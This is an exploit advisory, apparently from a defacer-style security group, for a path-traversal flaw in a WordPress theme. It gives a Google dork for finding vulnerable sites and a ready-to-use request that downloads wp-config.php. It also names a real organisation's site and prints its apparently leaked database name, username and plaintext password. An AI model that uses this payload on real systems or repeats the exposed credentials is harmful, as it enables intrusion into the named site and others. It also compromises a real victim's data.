############################################################################################ # Exploit Title : WordPress 4.9.8 KingAbdullahPort KAP Themes Database Configuration File Download # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 20/03/2019 # Vendor Homepages : kingabdullahport.com.sa - phoekus.com # Software Information Link : phoekus.com/webdesignandevelopmentwordpress linkedin.com/company/phoekus zoominfo.com/c/phoekus/371582770 # Software Affected Version : 4.9.8 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : High # Google Dorks : inurl:/wp-content/themes/kap/ intext:Site by Phoekus # Vulnerability Type : CWE-16 [ Configuration ] CWE-200 [ Information Exposure ] CWE-23 [ Relative Path Traversal ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos ############################################################################################ # Impact : *********** * WordPress 4.9.8 KingAbdullahPort KAP Themes is prone to a vulnerability that lets attackers download database config file because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the web server process and obtain potentially sensitive informations. * An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information. * The software has Relative Path Traversal vulnerability and it uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory. ############################################################################################ # Vulnerable File : **************** /download.php # Vulnerable Parameter : ********************** ?url= # Database Configuration File Download Exploit : ******************************************** /wp-content/themes/kap/download.php?url=../../../wp-config.php Informations About MySQL Database Configuration File => **************************************************** ** The name of the database for WordPress */ define('DB_NAME', ''); /** MySQL database username */ define('DB_USER', ''); /** MySQL database password */ define('DB_PASSWORD', ''); /** MySQL hostname */ define('DB_HOST', ''); ############################################################################################ # Example Vulnerable Sites : ************************* [+] kingabdullahport.com.sa/wp-content/themes/kap/download.php?url=../../../wp-config.php ** // /** The name of the database for WordPress */ define('DB_NAME', 'kingapor_kap'); / ** MySQL database username */ define('DB_USER', 'kingapor_kapusr'); / ** MySQL database password */ define('DB_PASSWORD', '@teGo0Z*zZBk'); / ** MySQL hostname * / define('DB_HOST', 'localhost'); / ** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); / ** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ''); /**#@+ * ############################################################################################ # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ############################################################################################